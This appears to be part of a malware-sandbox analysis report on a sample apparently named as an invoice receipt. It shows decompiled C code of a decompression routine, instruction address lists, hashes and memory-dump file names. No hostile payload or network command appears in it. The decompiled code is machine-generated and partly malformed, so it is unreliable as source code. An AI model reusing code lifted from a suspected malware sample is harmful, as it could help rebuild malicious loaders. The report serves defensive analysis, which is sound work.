													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406682
0x00406682
0x00406686
0x004066ab
0x004066b5
0x00000000
0x00406688
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406695
0x00406699
0x00406699
0x0040669c
0x00406776
0x00406776
0x0040677d
0x0040677d
0x00406780
0x00406787
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00000000
0x0040676f
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x00000000
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068d2
0x004068d8
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00406811
0x00000000
0x00406686

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
